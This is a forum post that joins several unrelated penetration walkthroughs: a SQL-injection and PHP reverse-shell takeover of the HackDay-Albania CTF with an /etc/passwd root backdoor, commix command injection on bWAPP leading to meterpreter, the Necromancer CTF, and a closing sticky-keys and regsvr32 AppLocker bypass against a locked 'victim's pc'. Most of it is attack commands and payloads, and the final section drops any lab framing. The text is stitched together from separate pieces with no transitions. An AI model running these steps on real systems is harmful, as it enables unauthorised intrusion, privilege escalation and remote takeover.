Login

**NINZA** · 04-25-2020, 04:54 AM

0			0

Hello friends!! Today we are going to solve another CTF challenge “HackDay-Albania” which is presented by Vulnhub.com and designed by R-73eN for the beginners who want to practice OSCP lab challenges. You can download it from here:

[To see content please register here]

Level: Beginner to Intermediate
Task: Boot to Root
Penetration Methodologies

Network Scanning (Nmap, Netdiscover)
Use Robot.txt
Apply SQL Injection
Upload PHP reverse Shell
Get netcat session
Edit etc/passwd file
Get Root access and capture the Flag

Walkthrough
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.127.
[Image: 1.png?w=687&ssl=1]

Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.
nmap -A 192.168.1.127
1
nmap -A 192.168.1.127
[Image: 2.png?w=687&ssl=1]

Here you can observe that port 22 and 8008 are opened, also you can observe there is a robot.txt file in which 15 entries are allowed and 26 are disallowed.
Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting. The message in the box translates to- “if I am, I know where to go Smile

”
We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here.
[Image: 3.png?w=687&ssl=1]

Then I try some of the entries of the robot.txt list which I found from Nmap scanning result and fortunately by exploring /unisxcudkqjydw/ in the browser I got another directory name “/vulnbank/”.
[Image: 4.png?w=687&ssl=1]

So again I explore a new URL in that browser and found a client folder from inside the Index page,

[To see content please register here]

1

[To see content please register here]

Clicking on the /client directory, we are greeted by a login page of very secure bank But we don’t have login credential.
[Image: 6.png?w=687&ssl=1]

Therefore, I try SQL injections for username and password and luckily following parameters get matched.
Username: ' or 'a' = 'a' --
Password: #
1
2
Username: ' or 'a' = 'a' --
Password: #
[Image: 7.png?w=687&ssl=1]

And it opened up like a beautiful treasure! As you can see, according to this web page “contact Support” here we can attach our file and can discuss our problem.
So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with a text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.
[Image: 8.png?w=687&ssl=1]

Then uploaded our PHP shell and execute to get a reverse connection at netcat.
[Image: 9.png?w=687&ssl=1]

nc -lvp 1234
1
nc -lvp 1234
From given below image you can observe netcat session. But the task is not finished yet, still, we need to penetrate more for privilege escalation. Then to access proper TTY shell we had import python one line script by typing following:
python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'
Then I check permission for passwd file and found that the file is writable.
ls -al /etc/passwd
1
ls -al /etc/passwd
[Image: 11.png?w=687&ssl=1]

So I open the file with cat command and select the copied whole content into a text file.
cat /etc/passwd
1
cat /etc/passwd
[Image: 12.png?w=687&ssl=1]

In a new terminal, we are using OpenSSL to make a new password hash combined salt value and password in MD5 algorithm. For this the below command is used:
openssl passwd -1 -salt ignite pass123
1
openssl passwd -1 -salt ignite pass123
Now copy this salt password and then open the text file where you copied /etc/passwd content.
[Image: 13.png?w=687&ssl=1]

Then we create a new entry for user “raj” and past above salt password. Also set UID and GID 0:0 for him to add him into root group member and save the file as passwd on the desktop. Now we have to transfer this file into victim’s machine so that we can replace it from original passwd file. Now run the web server on the Kali machine:
python -m SimpleHTTPServer 80
1
python -m SimpleHTTPServer 80
[Image: 14.png?w=687&ssl=1]

Now download the newly modify passwd file inside /tmp directory and then copy the downloaded file into /etc/passwd which will overwrite the content of the original passwd file.
cd /tmp
wget

[To see content please register here]

cp passwd /etc/passwd
1
2
3
cd /tmp
wget

[To see content please register here]

cp passwd /etc/passwd
[Image: 15.png?w=687&ssl=1]

When you have done above said steps then switch to your new user and try to gain root access.
su raj
cd /root
ls
cat flag.txt
1
2
3
4
su raj
cd /root
ls
cat flag.txt
Wonderful!! We have gained access and capture the flag.

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

[To see content please register here]

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp

[To see content please register here]

.

Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!!!!

Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.

Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to PING button.

Look at image you will find that I have got the details.

Open the terminal in kali Linux and type the commix command.
From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command
commix –url=”http://192.168.1.101:81/bWAPP/commandi_blind.php” –data=”target=target=192.168.1.101&form=submit” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2″

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.
Type ‘y’ to resumed the classic injection point and to pseudo terminal shell
Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.
commix(os_shell) > reverse_tcp
[Image: 4.png?w=687&ssl=1]

commix(reverse_tcp) > set LHOST 192.168.1.101
commix(reverse_tcp) > set LPORT 4444
Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) >7
Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.
commix(reverse_tcp) >2
[Image: 5.png?w=687&ssl=1]

Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.

Luckly!! We succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.

Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxy tag then click to inception is on button, come back to bWAPP and now click to Lookup.

Open the terminal in kali Linux and type the commix command.
commix –url=”http://192.168.1.101:81/bWAPP/commandi.php” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7″ –data=”target=192.168.1.101&form=submit”
[Image: 9.png?w=687&ssl=1]

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell
Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.
commix(os_shell) > reverse_tcp
[Image: 10.png?w=687&ssl=1]

commix(reverse_tcp) > set LHOST 192.168.1.101
commix(reverse_tcp) > set LPORT 4444
Option asks by commix to set backdoor for connection Type ‘2’ for other reverse TCP shells.
commix(reverse_tcp) > 2
Option asks by commix to set payload Type ‘7’ to use a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) >7
Option asks by commix to set powershell injection attack Type ‘2’ to use TrustedSec’s Magic Unicorn.
commix(reverse_tcp) >2
[Image: 12.png?w=687&ssl=1]

Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.
[Image: 13.png?w=687&ssl=1]

Once metasploit framework gets loaded and starts the payload handler come; back to your previous terminal and press enter. As it is mention in image.

Luckly!! Again we succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!

You can download necromancer from

[To see content please register here]

let’s get going. Firstly, we run netdiscover

Netdiscover

Our next step is nmap.
nmap -A -p- 192.168.0.110
[Image: 2.png?w=687&ssl=1]

The scan takes a bit time and gives us nothing. So, let’s try a UDP scan using nmap.
nmap -sU -T4 -p- 192.168.0.110
[Image: 3.png?w=687&ssl=1]

We get a UDP port 666 open. Lets try netcat on it.

nc -nvu 192.168.0.110 666

No matter how many times we hit enter, we get the same reply- “You gasp for air! Time is running out!”

When we tried running the machine (necromancer), we had a message regarding the IP – “Renewal in 3600 seconds”. This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

tcpdump host 192.168.0.110

We get to know about some gateway 4444. This can be another port on our target. Lets use netcat once again.

nc -nvlp 4444

And we get a text dump in return. It has capital characters, small characters and numbers as well. This has to be a base64 encoded text. We decode it at

[To see content please register here]

and get some sensible text.
[Image: 7.png?w=687&ssl=1]

Ok. We have our 1st flag. And a message to chant the flag’s string at UDP port 666. The flag1 text seems to be a md5 hash so we decrypt it at

[To see content please register here]

. It decrypts to “opensesame”. Let’s return to our port 666 using netcat and type in this string there.

nc -nvu 192.168.0.110

opensesame

Another hint. Numeral 80 reminds us ofport 80 used for http. Let’s fire up the victim machine’s IP to our browser on port 80.

Nothing useful except an image. Let’s download it and try to analyse it using binwalk
binwalk /root/Desktop/pileoffeathers.jpg
[Image: 10.png?w=687&ssl=1]

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a txt file named feathers.txt which again contains a base64 text. We it and get our 3rd flag along with a clue /amagicbridgeappearsatthechasm. Seems like a directory decode.
[Image: 12.png?w=687&ssl=1]

Opening the directory in our browser, we are greeted by another web-page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the necromancer’s spell. We google for “magic items wiki” and find some good stuff on the very first link. But what next?

We decide to make a custom dictionary with all the words on this wiki page. We will use cewl for this.
cewlhttps://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v
[Image: 15.png?w=687&ssl=1]

This makes a dictionary of magical items on our desktop. Let us try dirb to get our next clue.
dirb

[To see content please register here]

-w /root/Desktop/magicitems.txt
[Image: 16.1.png?w=687&ssl=1]

We get another directory as” result. “talisman.

When we visit the url now using talisman, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running
chmod 777 /root/Desktop/talisman
Thereafter we run the file by going to its location.
./talisman
[Image: 17.png?w=687&ssl=1]

No matter what we answer to the asked question –“Do you want to wear the talisman?”, the result is the same –“Nothing happens”. So lets try to debug the binary file.

gdb /root/Desktop/talisman

Get some info about the functions-

info functions

Create a break point at wearTalisman because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell

jump chantToBreakSpell

Yess. We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag’s words at UDP port 31337.

Now the words appear to be in md5 hash and upon decrypting it we get – “blackmagic” We now use netcat to connect to port 31337 and type in “blackmagic” there.

nc -unv 192.168.0.110 31337

blackmagic

And we get another directory along with our 5th flag

We open the directory with our victim’s IP.

Another webpage with a hint to see the UDP port 161(used for snmp) and a close look reveals that the word “necromancer” just before the image is actually a link. Upon clicking it we get another file to download named “necromancer”. We download and unzip it. It contains a cap file named necromancer. upon analyzing this file with wireshark, we discover that 802.11 protocol is being used. This indicates that the file is a wireless data cap file so let’s try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. use it with port 161 i.e. snmp.

snmpwalk-c death2all -v 1 192.168.0.110

It says that the door is locked.
[Image: 26.png?w=687&ssl=1]

Let’s try to unlock it using snmpset.
snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked
When the string changes to “Unlocked”, we run our previous command once again
snmpwalk -c death2all -v 1 192.168.0.110
[Image: 27.png?w=687&ssl=1]

Voila!! The door unlocks and we get another flag along with a clue i.e. TCP port 22 (used for ssh) . flag7{9e5494108d10bbd5f9e7ae52239546c4} – t22. Another md5 hash that decrypts to “demonslayer”.

We try to login to port 22 assuming “demonslayer” to be the password but fail.

ssh 192.168.0.110

demonslayer

This means that “demonslayer” should be the username for ssh. To crack the password, we will use metasploit along with rockyou.txt dictionary. Open a terminal for metasploit.
Search ssh_login
Thereafter we run the following commands:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.0.110
set username demonslayer
set pass_file /usr/share/wordlists/rockyou.txt
run
[Image: 30.png?w=687&ssl=1]

We get password as 12345678 and a shell as well.

But neither ls nor dir seems to be working on this shell.

So, we login to ssh via terminal on host using demonslayer/12345678

ssh [email protected]

12345678

Using ls -la we discover that there lies a flag8.txt file in the directory. To read its contents we use

cat flag8.txt

We get another hint regarding udp port 777. This does not works on our pc. So let us try on the victim’s shell.

nc -u localhost 777

and hit enter twice.

So the necromancer is now trying to play a game with us. upon googling for his question “Where do the Black Robes practice magic of the Greater Path?” We get the answer. its Kelewan.

Our 8th flag is here.flag8{55a6af2ca3fee9f2fef81d20743bda2c} and another question as well that asks, “Who did Johann Faust VIII make a deal with?” Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

And we get the next flag and yet another question “Who is tricked into passing the Ninth Gate?” Google comes in handy again and tells us the answer once more. The next answer is Hedge.

And our next flag awaits us. flag10{8dc6486d2c63cafcdc6efbba2be98ee4} nothing more to be noticed here. But if I am not wrong, we did see this “small vile” thing somewhere earlier. Let’s head back by cntrl+c and try to look for it.

We type in ls -la and yes it’s there “.smallvile” about which we just discovered in the description alongwith our 10th flag. Let’s open it using cat.

cat .smallvile

Hope this opened up some gates cause we don’t see any clue here. Let’s try sudo.

sudo –l

Seems to be working. It shows us the location of our 11th flag and that the flag11.txt file is not protected by any sort of password. Let’s try to open it.

sudo /bin/cat /root/flag11.txt

Wohoo!! Mission Accomplished. The last flag has been captured.
[Image: 42.png?w=687&ssl=1]

Lets learn how to take Meterpreter session of a pc in a network which is switched on but is locked and has remote desktop feature enabled on it.

Let us assume that our victim’s pc already has utilman attack or sticky keys attack enabled on it. To know more about sticky keys, visit

[To see content please register here]

.

You donot need physical access to the victim’s pc for this attack.

First, run metasploit on your pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim’s pc and enter the victim’s ip.

$rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.
[Image: 4.png?w=687&ssl=1]

Press the “shift” key 5 times to bring up the command prompt.
[Image: 5.png?w=687&ssl=1]

And returning to our previous terminal with meterpreter, we have finally got the session of victim’s pc on out terminal.

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis